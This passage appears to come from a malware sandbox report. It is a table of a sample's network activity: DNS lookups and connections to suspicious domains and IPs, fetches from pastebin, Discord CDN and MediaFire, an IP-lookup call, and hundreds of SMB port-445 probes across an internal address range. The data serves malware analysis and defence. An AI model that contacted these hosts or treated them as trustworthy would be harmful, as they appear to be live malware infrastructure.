| RU | 193.106.174.70:80 | trad-einmyus.com | tcp |
| US | 8.8.8.8:53 | hadogarden.com | udp |
| VN | 103.216.113.30:443 | hadogarden.com | tcp |
| US | 8.8.8.8:53 | 30.113.216.103.in-addr.arpa | udp |
| BG | 185.82.216.104:443 | server4.createupdate.org | tcp |
| N/A | 127.0.0.1:31465 | tcp | |
| TR | 195.16.74.230:80 | aiueiup.ru | tcp |
| US | 8.8.8.8:53 | edurestunningcrackyow.fun | udp |
| US | 8.8.8.8:53 | technologyenterdo.shop | udp |
| US | 8.8.8.8:53 | lighterepisodeheighte.fun | udp |
| US | 8.8.8.8:53 | problemregardybuiwo.fun | udp |
| US | 8.8.8.8:53 | detectordiscusser.shop | udp |
| US | 8.8.8.8:53 | pooreveningfuseor.pw | udp |
| US | 8.8.8.8:53 | turkeyunlikelyofw.shop | udp |
| US | 104.21.10.242:443 | associationokeo.shop | tcp |
| US | 8.8.8.8:53 | yip.su | udp |
| US | 8.8.8.8:53 | pastebin.com | udp |
| US | 104.21.79.77:443 | yip.su | tcp |
| US | 104.20.68.143:443 | pastebin.com | tcp |
| US | 8.8.8.8:53 | 77.79.21.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 143.68.20.104.in-addr.arpa | udp |
| DE | 185.172.128.126:80 | 185.172.128.126 | tcp |
| US | 8.8.8.8:53 | galandskiyher5.com | udp |
| US | 8.8.8.8:53 | midnight.bestsup.su | udp |
| US | 8.8.8.8:53 | namecloudvideo.org | udp |
| US | 8.8.8.8:53 | net.geo.opera.com | udp |
| US | 15.204.49.148:80 | 15.204.49.148 | tcp |
| RU | 193.106.174.70:80 | galandskiyher5.com | tcp |
| NL | 185.26.182.112:80 | net.geo.opera.com | tcp |
| US | 188.114.97.2:443 | namecloudvideo.org | tcp |
| US | 104.21.29.103:80 | midnight.bestsup.su | tcp |
| NL | 185.26.182.112:443 | net.geo.opera.com | tcp |
| US | 8.8.8.8:53 | shipbank.org | udp |
| US | 172.67.146.202:443 | shipbank.org | tcp |
| TR | 195.16.74.230:80 | aiueiup.ru | tcp |
| DE | 185.172.128.90:80 | 185.172.128.90 | tcp |
| DE | 185.172.128.187:80 | 185.172.128.187 | tcp |
| RU | 193.106.174.70:80 | galandskiyher5.com | tcp |
| RU | 193.106.174.70:80 | galandskiyher5.com | tcp |
| RU | 193.106.174.70:80 | galandskiyher5.com | tcp |
| RU | 193.106.174.70:80 | galandskiyher5.com | tcp |
| DE | 185.172.128.145:80 | 185.172.128.145 | tcp |
| BG | 185.82.216.104:443 | server4.createupdate.org | tcp |
| US | 8.8.8.8:53 | dham2fjg7wsuiqovkuaqkfc42rhfbctvzf4filsx5kq7iqvvd5n2tuad.onion.ly | udp |
| US | 209.141.39.59:443 | dham2fjg7wsuiqovkuaqkfc42rhfbctvzf4filsx5kq7iqvvd5n2tuad.onion.ly | tcp |
| US | 8.8.8.8:53 | 59.39.141.209.in-addr.arpa | udp |
| US | 8.8.8.8:53 | desktop-netinstaller-sub.osp.opera.software | udp |
| US | 8.8.8.8:53 | autoupdate.geo.opera.com | udp |
| NL | 82.145.217.121:443 | desktop-netinstaller-sub.osp.opera.software | tcp |
| NL | 185.26.182.124:443 | autoupdate.geo.opera.com | tcp |
| US | 8.8.8.8:53 | download.opera.com | udp |
| NL | 185.26.182.122:443 | download.opera.com | tcp |
| US | 8.8.8.8:53 | download3.operacdn.com | udp |
| GB | 95.101.143.176:443 | download3.operacdn.com | tcp |
| US | 8.8.8.8:53 | 176.143.101.95.in-addr.arpa | udp |
| TR | 94.156.8.100:80 | 94.156.8.100 | tcp |
| US | 8.8.8.8:53 | trad-einmyus.com | udp |
| RU | 193.106.174.70:80 | trad-einmyus.com | tcp |
| RU | 193.106.174.70:80 | trad-einmyus.com | tcp |
| US | 8.8.8.8:53 | 100.8.156.94.in-addr.arpa | udp |
| RU | 193.106.174.70:80 | trad-einmyus.com | tcp |
| RU | 193.106.174.70:80 | trad-einmyus.com | tcp |
| RU | 193.106.174.70:80 | trad-einmyus.com | tcp |
| NL | 195.20.16.82:443 | tcp | |
| US | 8.8.8.8:53 | 82.16.20.195.in-addr.arpa | udp |
| RU | 193.106.174.70:80 | trad-einmyus.com | tcp |
| RU | 193.106.174.70:80 | trad-einmyus.com | tcp |
| US | 8.8.8.8:53 | demo.nessotechbd.com | udp |
| US | 192.185.16.114:443 | demo.nessotechbd.com | tcp |
| US | 8.8.8.8:53 | trecube.com | udp |
| US | 172.67.177.174:443 | trecube.com | tcp |
| US | 8.8.8.8:53 | 114.16.185.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 174.177.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | 1.112.95.208.in-addr.arpa | udp |
| TR | 195.16.74.230:80 | aiueiup.ru | tcp |
| US | 8.8.8.8:53 | gZrMmkMPXNMnXLftODCxOMCJtQlce.gZrMmkMPXNMnXLftODCxOMCJtQlce | udp |
| RU | 193.106.174.70:80 | trad-einmyus.com | tcp |
| RU | 193.106.174.70:80 | trad-einmyus.com | tcp |
| US | 8.8.8.8:53 | unotree.ru | udp |
| US | 172.67.169.128:443 | unotree.ru | tcp |
| RU | 193.106.174.70:80 | trad-einmyus.com | tcp |
| RU | 193.106.174.70:80 | trad-einmyus.com | tcp |
| DE | 185.149.146.227:80 | tcp | |
| US | 8.8.8.8:53 | 128.169.67.172.in-addr.arpa | udp |
| RU | 193.106.174.70:80 | trad-einmyus.com | tcp |
| US | 8.8.8.8:53 | streamingplay.site | udp |
| US | 8.8.8.8:53 | server4.createupdate.org | udp |
| BG | 185.82.216.104:443 | server4.createupdate.org | tcp |
| BR | 45.152.46.72:443 | streamingplay.site | tcp |
| RU | 193.106.174.70:80 | trad-einmyus.com | tcp |
| US | 8.8.8.8:53 | 72.46.152.45.in-addr.arpa | udp |
| RU | 193.106.174.70:80 | trad-einmyus.com | tcp |
| RU | 185.215.113.45:80 | 185.215.113.45 | tcp |
| US | 8.8.8.8:53 | 45.113.215.185.in-addr.arpa | udp |
| RU | 193.106.174.70:80 | trad-einmyus.com | tcp |
| US | 8.8.8.8:53 | steadfastvaluabelywomo.shop | udp |
| US | 104.21.95.139:443 | steadfastvaluabelywomo.shop | tcp |
| RU | 193.106.174.70:80 | trad-einmyus.com | tcp |
| US | 8.8.8.8:53 | download938.mediafire.com | udp |
| US | 8.8.8.8:53 | technologyenterdo.shop | udp |
| US | 8.8.8.8:53 | 139.95.21.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | lighterepisodeheighte.fun | udp |
| US | 8.8.8.8:53 | problemregardybuiwo.fun | udp |
| US | 205.196.121.133:443 | download938.mediafire.com | tcp |
| US | 8.8.8.8:53 | 133.121.196.205.in-addr.arpa | udp |
| US | 8.8.8.8:53 | carsalessystem.com | udp |
| US | 172.67.221.71:443 | carsalessystem.com | tcp |
| US | 8.8.8.8:53 | www.mediafire.com | udp |
| US | 104.16.114.74:443 | www.mediafire.com | tcp |
| US | 8.8.8.8:53 | 71.221.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | detectordiscusser.shop | udp |
| US | 8.8.8.8:53 | 74.114.16.104.in-addr.arpa | udp |
| BG | 185.82.216.104:443 | server4.createupdate.org | tcp |
| US | 8.8.8.8:53 | cdn.discordapp.com | udp |
| US | 162.159.135.233:443 | cdn.discordapp.com | tcp |
| US | 8.8.8.8:53 | edurestunningcrackyow.fun | udp |
| US | 8.8.8.8:53 | 233.135.159.162.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pooreveningfuseor.pw | udp |
| US | 8.8.8.8:53 | turkeyunlikelyofw.shop | udp |
| US | 8.8.8.8:53 | associationokeo.shop | udp |
| US | 172.67.147.18:443 | associationokeo.shop | tcp |
| US | 8.8.8.8:53 | 18.147.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | showlock.net | udp |
| NL | 190.2.153.200:40001 | showlock.net | tcp |
| US | 8.8.8.8:53 | 200.153.2.190.in-addr.arpa | udp |
| TR | 195.16.74.230:80 | aiueiup.ru | tcp |
| BG | 185.82.216.104:443 | server4.createupdate.org | tcp |
| US | 8.8.8.8:53 | stun.ipfire.org | udp |
| LT | 91.211.247.248:53 | aibukfn.ru | udp |
| TR | 195.16.74.230:80 | aibukfn.ru | tcp |
| BG | 185.82.216.104:443 | server4.createupdate.org | tcp |
| RU | 185.215.113.32:80 | 185.215.113.32 | tcp |
| US | 8.8.8.8:53 | 32.113.215.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | trythisgid.com | udp |
| CZ | 46.8.8.100:443 | trythisgid.com | tcp |
| US | 8.8.8.8:53 | ww82.trythisgid.com | udp |
| US | 199.59.243.225:80 | ww82.trythisgid.com | tcp |
| US | 8.8.8.8:53 | 100.8.8.46.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 225.243.59.199.in-addr.arpa | udp |
| N/A | 10.127.0.1:445 | tcp | |
| N/A | 10.127.0.31:445 | tcp | |
| N/A | 10.127.0.30:445 | tcp | |
| N/A | 10.127.0.18:445 | tcp | |
| N/A | 10.127.0.37:445 | tcp | |
| N/A | 10.127.0.12:445 | tcp | |
| N/A | 10.127.0.29:445 | tcp | |
| N/A | 10.127.0.44:445 | tcp | |
| N/A | 10.127.0.23:445 | tcp | |
| N/A | 10.127.0.28:445 | tcp | |
| N/A | 10.127.0.46:445 | tcp | |
| N/A | 10.127.0.52:445 | tcp | |
| N/A | 10.127.0.27:445 | tcp | |
| N/A | 10.127.0.54:445 | tcp | |
| N/A | 10.127.0.16:445 | tcp | |
| N/A | 10.127.0.20:445 | tcp | |
| N/A | 10.127.0.26:445 | tcp | |
| N/A | 10.127.0.8:445 | tcp | |
| N/A | 10.127.0.19:445 | tcp | |
| N/A | 10.127.0.32:445 | tcp | |
| N/A | 10.127.0.63:445 | tcp | |
| N/A | 10.127.0.5:445 | tcp | |
| N/A | 10.127.0.57:445 | tcp | |
| N/A | 10.127.0.50:445 | tcp | |
| N/A | 10.127.0.22:445 | tcp | |
| N/A | 10.127.0.42:445 | tcp | |
| N/A | 10.127.0.7:445 | tcp | |
| N/A | 10.127.0.35:445 | tcp | |
| N/A | 10.127.0.4:445 | tcp | |
| N/A | 10.127.0.53:445 | tcp | |
| N/A | 10.127.0.33:445 | tcp | |
| N/A | 10.127.0.2:445 | tcp | |
| N/A | 10.127.0.21:445 | tcp | |
| N/A | 10.127.0.48:445 | tcp | |
| N/A | 10.127.0.47:445 | tcp | |
| N/A | 10.127.0.51:445 | tcp | |
| N/A | 10.127.0.56:445 | tcp | |
| N/A | 10.127.0.49:445 | tcp | |
| N/A | 10.127.0.9:445 | tcp | |
| N/A | 10.127.0.43:445 | tcp | |
| N/A | 10.127.0.55:445 | tcp | |
| N/A | 10.127.0.25:445 | tcp | |
| N/A | 10.127.0.60:445 | tcp | |
| N/A | 10.127.0.38:445 | tcp | |
| N/A | 10.127.0.13:445 | tcp | |
| N/A | 10.127.0.6:445 | tcp | |
| N/A | 10.127.0.14:445 | tcp | |
| N/A | 10.127.0.34:445 | tcp | |
| N/A | 10.127.0.36:445 | tcp | |
| N/A | 10.127.0.24:445 | tcp | |
| N/A | 10.127.0.10:445 | tcp | |
| N/A | 10.127.0.62:445 | tcp | |
| N/A | 10.127.0.58:445 | tcp | |
| N/A | 10.127.0.45:445 | tcp | |
| N/A | 10.127.0.61:445 | tcp | |
| N/A | 10.127.0.11:445 | tcp | |
| N/A | 10.127.0.15:445 | tcp | |
| N/A | 10.127.0.41:445 | tcp | |
| N/A | 10.127.0.3:445 | tcp | |
| N/A | 10.127.0.59:445 | tcp | |
| N/A | 10.127.0.17:445 | tcp | |
| N/A | 10.127.0.39:445 | tcp | |
| N/A | 10.127.0.40:445 | tcp | |
| N/A | 10.127.0.67:445 | tcp | |
| N/A | 10.127.0.95:445 | tcp | |
| N/A | 10.127.0.77:445 | tcp | |
| N/A | 10.127.0.86:445 | tcp | |
| N/A | 10.127.0.69:445 | tcp | |
| N/A | 10.127.0.91:445 | tcp | |
| N/A | 10.127.0.101:445 | tcp | |
| N/A | 10.127.0.108:445 | tcp | |
| N/A | 10.127.0.76:445 | tcp | |
| N/A | 10.127.0.80:445 | tcp | |
| N/A | 10.127.0.93:445 | tcp | |
| N/A | 10.127.0.119:445 | tcp | |
| N/A | 10.127.0.66:445 | tcp | |
| N/A | 10.127.0.116:445 | tcp | |
| N/A | 10.127.0.112:445 | tcp | |
| N/A | 10.127.0.74:445 | tcp | |
| N/A | 10.127.0.84:445 | tcp | |
| N/A | 10.127.0.114:445 | tcp | |
| N/A | 10.127.0.100:445 | tcp | |
| N/A | 10.127.0.90:445 | tcp | |
| N/A | 10.127.0.118:445 | tcp | |
| N/A | 10.127.0.65:445 | tcp | |
| N/A | 10.127.0.111:445 | tcp | |
| N/A | 10.127.0.127:445 | tcp | |
| N/A | 10.127.0.120:445 | tcp | |
| N/A | 10.127.0.122:445 | tcp | |
| N/A | 10.127.0.128:445 | tcp | |
| N/A | 10.127.0.75:445 | tcp | |
| N/A | 10.127.0.126:445 | tcp | |
| N/A | 10.127.0.73:445 | tcp | |
| N/A | 10.127.0.92:445 | tcp | |
| N/A | 10.127.0.88:445 | tcp | |
| N/A | 10.127.0.125:445 | tcp | |
| N/A | 10.127.0.68:445 | tcp | |
| N/A | 10.127.0.103:445 | tcp | |
| N/A | 10.127.0.70:445 | tcp | |
| N/A | 10.127.0.107:445 | tcp | |
| N/A | 10.127.0.104:445 | tcp | |
| N/A | 10.127.0.115:445 | tcp | |
| N/A | 10.127.0.89:445 | tcp | |
| N/A | 10.127.0.102:445 | tcp | |
| N/A | 10.127.0.105:445 | tcp | |
| N/A | 10.127.0.117:445 | tcp | |
| N/A | 10.127.0.79:445 | tcp | |
| N/A | 10.127.0.81:445 | tcp | |
| N/A | 10.127.0.106:445 | tcp | |
| N/A | 10.127.0.72:445 | tcp | |
| N/A | 10.127.0.99:445 | tcp | |
| N/A | 10.127.0.83:445 | tcp | |
| N/A | 10.127.0.97:445 | tcp | |
| N/A | 10.127.0.110:445 | tcp | |
| N/A | 10.127.0.109:445 | tcp | |
| N/A | 10.127.0.121:445 | tcp | |
| N/A | 10.127.0.123:445 | tcp | |
| N/A | 10.127.0.113:445 | tcp | |
| N/A | 10.127.0.87:445 | tcp | |
| N/A | 10.127.0.96:445 | tcp | |
| N/A | 10.127.0.64:445 | tcp | |
| N/A | 10.127.0.124:445 | tcp | |
| N/A | 10.127.0.82:445 | tcp | |
| N/A | 10.127.0.85:445 | tcp | |
| N/A | 10.127.0.94:445 | tcp | |
| N/A | 10.127.0.78:445 | tcp | |
| N/A | 10.127.0.98:445 | tcp | |
| N/A | 10.127.0.149:445 | tcp | |
| N/A | 10.127.0.154:445 | tcp | |
| N/A | 10.127.0.166:445 | tcp | |
| N/A | 10.127.0.185:445 | tcp | |
| N/A | 10.127.0.180:445 | tcp | |
| N/A | 10.127.0.153:445 | tcp | |
| N/A | 10.127.0.167:445 | tcp | |
| N/A | 10.127.0.140:445 | tcp | |
| N/A | 10.127.0.151:445 | tcp | |
| N/A | 10.127.0.168:445 | tcp | |
| N/A | 10.127.0.192:445 | tcp | |
| N/A | 10.127.0.164:445 | tcp | |
| N/A | 10.127.0.174:445 | tcp | |
| N/A | 10.127.0.187:445 | tcp | |
| N/A | 10.127.0.139:445 | tcp | |
| N/A | 10.127.0.183:445 | tcp | |
| N/A | 10.127.0.141:445 | tcp | |
| N/A | 10.127.0.142:445 | tcp | |
| N/A | 10.127.0.162:445 | tcp | |
| N/A | 10.127.0.163:445 | tcp | |
| N/A | 10.127.0.155:445 | tcp | |
| N/A | 10.127.0.158:445 | tcp | |
| N/A | 10.127.0.159:445 | tcp | |
| N/A | 10.127.0.137:445 | tcp | |
| N/A | 10.127.0.191:445 | tcp | |
| N/A | 10.127.0.147:445 | tcp | |
| N/A | 10.127.0.134:445 | tcp | |
| N/A | 10.127.0.178:445 | tcp | |
| N/A | 10.127.0.143:445 | tcp | |
| N/A | 10.127.0.131:445 | tcp | |
| N/A | 10.127.0.132:445 | tcp | |
| N/A | 10.127.0.177:445 | tcp | |
| N/A | 10.127.0.145:445 | tcp | |
| N/A | 10.127.0.152:445 | tcp | |
| N/A | 10.127.0.182:445 | tcp | |
| N/A | 10.127.0.165:445 | tcp | |
| N/A | 10.127.0.129:445 | tcp | |
| N/A | 10.127.0.138:445 | tcp | |
| N/A | 10.127.0.156:445 | tcp | |
| N/A | 10.127.0.175:445 | tcp | |
| N/A | 10.127.0.169:445 | tcp | |
| N/A | 10.127.0.161:445 | tcp | |
| N/A | 10.127.0.135:445 | tcp | |
| N/A | 10.127.0.157:445 | tcp | |
| N/A | 10.127.0.176:445 | tcp | |
| N/A | 10.127.0.136:445 | tcp | |
| N/A | 10.127.0.146:445 | tcp | |
| N/A | 10.127.0.148:445 | tcp | |
| N/A | 10.127.0.173:445 | tcp | |
| N/A | 10.127.0.190:445 | tcp | |
| N/A | 10.127.0.160:445 | tcp | |
| N/A | 10.127.0.150:445 | tcp | |
| N/A | 10.127.0.170:445 | tcp | |
| N/A | 10.127.0.130:445 | tcp | |
| N/A | 10.127.0.188:445 | tcp | |
| N/A | 10.127.0.181:445 | tcp | |
| N/A | 10.127.0.171:445 | tcp | |
| N/A | 10.127.0.172:445 | tcp | |
| N/A | 10.127.0.186:445 | tcp | |
| N/A | 10.127.0.189:445 | tcp | |
| N/A | 10.127.0.179:445 | tcp | |
| N/A | 10.127.0.133:445 | tcp | |
| N/A | 10.127.0.184:445 | tcp | |
| N/A | 10.127.0.144:445 | tcp | |
| N/A | 10.127.0.203:445 | tcp | |
| N/A | 10.127.0.230:445 | tcp | |
| N/A | 10.127.0.238:445 | tcp | |
| N/A | 10.127.0.223:445 | tcp | |
| N/A | 10.127.0.224:445 | tcp | |
| N/A | 10.127.0.219:445 | tcp | |
| N/A | 10.127.0.204:445 | tcp | |
| N/A | 10.127.0.207:445 | tcp | |
| N/A | 10.127.0.201:445 | tcp | |
| N/A | 10.127.0.226:445 | tcp | |
| N/A | 10.127.0.227:445 | tcp | |
| N/A | 10.127.0.200:445 | tcp | |
| N/A | 10.127.0.252:445 | tcp | |
| N/A | 10.127.0.253:445 | tcp | |
| N/A | 10.127.0.232:445 | tcp | |
| N/A | 10.127.0.196:445 | tcp | |
| N/A | 10.127.0.212:445 | tcp | |
| N/A | 10.127.0.214:445 | tcp | |
| N/A | 10.127.0.231:445 | tcp | |
| N/A | 10.127.0.242:445 | tcp | |
| N/A | 10.127.0.244:445 | tcp | |
| N/A | 10.127.0.235:445 | tcp | |
| N/A | 10.127.0.243:445 | tcp | |
| N/A | 10.127.0.197:445 | tcp | |
| N/A | 10.127.0.241:445 | tcp | |
| N/A | 10.127.0.255:445 | tcp | |
| N/A | 10.127.0.193:445 | tcp | |
| N/A | 10.127.0.206:445 | tcp | |
| N/A | 10.127.0.246:445 | tcp | |
| N/A | 10.127.0.205:445 | tcp | |
| N/A | 10.127.0.220:445 | tcp | |
| N/A | 10.127.0.202:445 | tcp | |
| N/A | 10.127.0.208:445 | tcp | |
| N/A | 10.127.0.195:445 | tcp | |
| N/A | 10.127.0.245:445 | tcp | |
| N/A | 10.127.0.215:445 | tcp | |
| N/A | 10.127.0.210:445 | tcp | |
| N/A | 10.127.0.248:445 | tcp | |
| N/A | 10.127.0.198:445 | tcp | |
| N/A | 10.127.0.237:445 | tcp | |
| N/A | 10.127.0.240:445 | tcp | |
| N/A | 10.127.0.250:445 | tcp | |
| N/A | 10.127.0.194:445 | tcp | |
| N/A | 10.127.0.217:445 | tcp | |
| N/A | 10.127.0.247:445 | tcp | |
| N/A | 10.127.0.234:445 | tcp | |
| N/A | 10.127.0.239:445 | tcp | |
| N/A | 10.127.0.254:445 | tcp | |
| N/A | 10.127.0.251:445 | tcp | |
| N/A | 10.127.0.211:445 | tcp | |
| N/A | 10.127.0.225:445 | tcp | |
| N/A | 10.127.0.209:445 | tcp | |
| N/A | 10.127.0.228:445 | tcp | |
| N/A | 10.127.0.233:445 | tcp | |
| N/A | 10.127.0.236:445 | tcp | |
| N/A | 10.127.0.222:445 | tcp | |
| N/A | 10.127.0.218:445 | tcp | |
| N/A | 10.127.0.216:445 | tcp | |
| N/A | 10.127.0.229:445 | tcp | |
| N/A | 10.127.1.0:445 | tcp | |
| N/A | 10.127.0.221:445 | tcp | |
| N/A | 10.127.0.213:445 | tcp | |
| N/A | 10.127.0.199:445 | tcp | |
| N/A | 10.127.0.249:445 | tcp | |
| TR | 195.16.74.230:80 | aibukfn.ru | tcp |
| N/A | 10.127.1.12:445 | tcp | |
| N/A | 10.127.1.61:445 | tcp | |
| N/A | 10.127.1.8:445 | tcp | |
| N/A | 10.127.1.45:445 | tcp | |
| N/A | 10.127.1.20:445 | tcp | |
| N/A | 10.127.1.63:445 | tcp | |
| N/A | 10.127.1.2:445 | tcp | |
| N/A | 10.127.1.32:445 | tcp | |
| N/A | 10.127.1.4:445 | tcp | |
| N/A | 10.127.1.55:445 | tcp | |
| N/A | 10.127.1.36:445 | tcp | |
| N/A | 10.127.1.31:445 | tcp | |
| N/A | 10.127.1.34:445 | tcp | |
| N/A | 10.127.1.16:445 | tcp | |
| N/A | 10.127.1.60:445 | tcp | |
| N/A | 10.127.1.42:445 | tcp | |
| N/A | 10.127.1.13:445 | tcp | |
| N/A | 10.127.1.19:445 | tcp | |
| N/A | 10.127.1.29:445 | tcp | |
| N/A | 10.127.1.54:445 | tcp | |
| N/A | 10.127.1.33:445 | tcp | |
| N/A | 10.127.1.37:445 | tcp | |
| N/A | 10.127.1.9:445 | tcp | |
| N/A | 10.127.1.1:445 | tcp | |
| N/A | 10.127.1.57:445 | tcp | |
| N/A | 10.127.1.5:445 | tcp | |
| N/A | 10.127.1.11:445 | tcp | |
| N/A | 10.127.1.46:445 | tcp | |
| N/A | 10.127.1.39:445 | tcp | |
| N/A | 10.127.1.38:445 | tcp | |
| N/A | 10.127.1.44:445 | tcp | |
| N/A | 10.127.1.47:445 | tcp | |
| N/A | 10.127.1.7:445 | tcp | |
| N/A | 10.127.1.59:445 | tcp | |
| N/A | 10.127.1.14:445 | tcp | |
| N/A | 10.127.1.21:445 | tcp | |
| N/A | 10.127.1.24:445 | tcp | |
| N/A | 10.127.1.22:445 | tcp | |
| N/A | 10.127.1.51:445 | tcp | |
| N/A | 10.127.1.64:445 | tcp | |
| N/A | 10.127.1.25:445 | tcp | |
| N/A | 10.127.1.15:445 | tcp | |
| N/A | 10.127.1.35:445 | tcp | |
| N/A | 10.127.1.30:445 | tcp | |
| N/A | 10.127.1.3:445 | tcp | |
| N/A | 10.127.1.50:445 | tcp | |
| N/A | 10.127.1.52:445 | tcp | |
| N/A | 10.127.1.6:445 | tcp | |
| N/A | 10.127.1.23:445 | tcp | |
| N/A | 10.127.1.26:445 | tcp | |
| N/A | 10.127.1.28:445 | tcp | |
| N/A | 10.127.1.48:445 | tcp | |
| N/A | 10.127.1.53:445 | tcp | |
| N/A | 10.127.1.40:445 | tcp | |
| N/A | 10.127.1.18:445 | tcp | |
| N/A | 10.127.1.17:445 | tcp | |
| N/A | 10.127.1.43:445 | tcp | |
| N/A | 10.127.1.10:445 | tcp | |
| N/A | 10.127.1.27:445 | tcp | |
| N/A | 10.127.1.58:445 | tcp | |
| N/A | 10.127.1.62:445 | tcp | |
| N/A | 10.127.1.49:445 | tcp | |
| N/A | 10.127.1.56:445 | tcp | |
| N/A | 10.127.1.41:445 | tcp | |
| N/A | 10.127.1.69:445 | tcp | |
| N/A | 10.127.1.70:445 | tcp | |
| N/A | 10.127.1.119:445 | tcp | |
| N/A | 10.127.1.108:445 | tcp | |
| N/A | 10.127.1.117:445 | tcp | |
| N/A | 10.127.1.123:445 | tcp | |
| N/A | 10.127.1.126:445 | tcp | |
| N/A | 10.127.1.91:445 | tcp | |
| N/A | 10.127.1.81:445 | tcp | |
| N/A | 10.127.1.99:445 | tcp | |
| N/A | 10.127.1.100:445 | tcp | |
| N/A | 10.127.1.118:445 | tcp | |
| N/A | 10.127.1.122:445 | tcp | |
| N/A | 10.127.1.125:445 | tcp | |
| N/A | 10.127.1.79:445 | tcp | |
| N/A | 10.127.1.93:445 | tcp | |
| N/A | 10.127.1.104:445 | tcp | |
| N/A | 10.127.1.92:445 | tcp | |
| N/A | 10.127.1.98:445 | tcp | |
| N/A | 10.127.1.127:445 | tcp | |
| N/A | 10.127.1.75:445 | tcp | |
| N/A | 10.127.1.109:445 | tcp | |
| N/A | 10.127.1.89:445 | tcp | |
| N/A | 10.127.1.82:445 | tcp | |
| N/A | 10.127.1.128:445 | tcp | |
| RU | 185.215.113.32:80 | 185.215.113.32 | tcp |
| N/A | 10.127.1.71:445 | tcp | |
| N/A | 10.127.1.111:445 | tcp | |
| N/A | 10.127.1.96:445 | tcp | |
| N/A | 10.127.1.97:445 | tcp | |
| N/A | 10.127.1.105:445 | tcp | |
| N/A | 10.127.1.110:445 | tcp | |
| N/A | 10.127.1.74:445 | tcp | |
| N/A | 10.127.1.78:445 | tcp | |
| N/A | 10.127.1.83:445 | tcp | |
| N/A | 10.127.1.80:445 | tcp | |
| N/A | 10.127.1.124:445 | tcp | |
| N/A | 10.127.1.65:445 | tcp | |
| N/A | 10.127.1.90:445 | tcp | |
| N/A | 10.127.1.88:445 | tcp | |
| N/A | 10.127.1.73:445 | tcp | |
| N/A | 10.127.1.94:445 | tcp | |
| N/A | 10.127.1.121:445 | tcp | |
| N/A | 10.127.1.66:445 | tcp | |
| N/A | 10.127.1.116:445 | tcp | |
| N/A | 10.127.1.85:445 | tcp | |
| N/A | 10.127.1.113:445 | tcp | |
| N/A | 10.127.1.102:445 | tcp | |
| N/A | 10.127.1.101:445 | tcp | |
| N/A | 10.127.1.76:445 | tcp | |
| N/A | 10.127.1.103:445 | tcp | |
| N/A | 10.127.1.115:445 | tcp | |
| N/A | 10.127.1.87:445 | tcp | |
| N/A | 10.127.1.67:445 | tcp | |
| N/A | 10.127.1.72:445 | tcp | |
| N/A | 10.127.1.106:445 | tcp | |
| N/A | 10.127.1.112:445 | tcp | |
| N/A | 10.127.1.84:445 | tcp | |
| N/A | 10.127.1.86:445 | tcp | |
| N/A | 10.127.1.95:445 | tcp | |
| N/A | 10.127.1.107:445 | tcp | |
| N/A | 10.127.1.68:445 | tcp | |
| N/A | 10.127.1.77:445 | tcp | |
| N/A | 10.127.1.114:445 | tcp | |
| N/A | 10.127.1.120:445 | tcp | |
| N/A | 10.127.1.137:445 | tcp | |
| N/A | 10.127.1.138:445 | tcp | |
| N/A | 10.127.1.140:445 | tcp | |
| N/A | 10.127.1.161:445 | tcp | |
| N/A | 10.127.1.181:445 | tcp | |
| N/A | 10.127.1.156:445 | tcp | |
| N/A | 10.127.1.159:445 | tcp | |
| N/A | 10.127.1.145:445 | tcp | |
| N/A | 10.127.1.146:445 | tcp | |
| N/A | 10.127.1.183:445 | tcp | |
| N/A | 10.127.1.139:445 | tcp | |
| N/A | 10.127.1.169:445 | tcp | |
| N/A | 10.127.1.135:445 | tcp | |
| N/A | 10.127.1.178:445 | tcp | |
| N/A | 10.127.1.163:445 | tcp | |
| N/A | 10.127.1.170:445 | tcp | |
| N/A | 10.127.1.188:445 | tcp | |
| N/A | 10.127.1.147:445 | tcp | |
| N/A | 10.127.1.177:445 | tcp | |
| N/A | 10.127.1.131:445 | tcp | |
| N/A | 10.127.1.153:445 | tcp | |
| N/A | 10.127.1.180:445 | tcp | |
| N/A | 10.127.1.164:445 | tcp | |
| N/A | 10.127.1.186:445 | tcp | |
| N/A | 10.127.1.129:445 | tcp | |
| N/A | 10.127.1.136:445 | tcp | |
| N/A | 10.127.1.167:445 | tcp | |
| N/A | 10.127.1.191:445 | tcp | |
| N/A | 10.127.1.130:445 | tcp | |
| N/A | 10.127.1.134:445 | tcp | |
| N/A | 10.127.1.148:445 | tcp | |
| N/A | 10.127.1.133:445 | tcp | |
| N/A | 10.127.1.141:445 | tcp | |
| N/A | 10.127.1.143:445 | tcp | |
| N/A | 10.127.1.184:445 | tcp | |
| N/A | 10.127.1.151:445 | tcp | |
| N/A | 10.127.1.175:445 | tcp | |
| N/A | 10.127.1.154:445 | tcp | |
| N/A | 10.127.1.160:445 | tcp | |
| N/A | 10.127.1.171:445 | tcp | |
| N/A | 10.127.1.132:445 | tcp | |
| N/A | 10.127.1.149:445 | tcp | |
| N/A | 10.127.1.172:445 | tcp | |
| N/A | 10.127.1.144:445 | tcp | |
| N/A | 10.127.1.157:445 | tcp | |
| N/A | 10.127.1.187:445 | tcp | |
| N/A | 10.127.1.166:445 | tcp | |
| N/A | 10.127.1.155:445 | tcp | |
| N/A | 10.127.1.168:445 | tcp | |
| N/A | 10.127.1.190:445 | tcp | |
| N/A | 10.127.1.152:445 | tcp | |
| N/A | 10.127.1.189:445 | tcp | |
| N/A | 10.127.1.192:445 | tcp | |
| N/A | 10.127.1.142:445 | tcp | |
| N/A | 10.127.1.185:445 | tcp | |
| N/A | 10.127.1.158:445 | tcp | |
| N/A | 10.127.1.173:445 | tcp | |
| N/A | 10.127.1.174:445 | tcp | |
| N/A | 10.127.1.179:445 | tcp | |
| N/A | 10.127.1.150:445 | tcp | |
| N/A | 10.127.1.182:445 | tcp | |
| N/A | 10.127.1.165:445 | tcp | |
| N/A | 10.127.1.176:445 | tcp | |
| N/A | 10.127.1.162:445 | tcp | |
| RU | 185.215.113.32:80 | 185.215.113.32 | tcp |
| N/A | 10.127.1.204:445 | tcp | |
| N/A | 10.127.1.195:445 | tcp | |
| N/A | 10.127.1.212:445 | tcp | |
| N/A | 10.127.1.206:445 | tcp | |
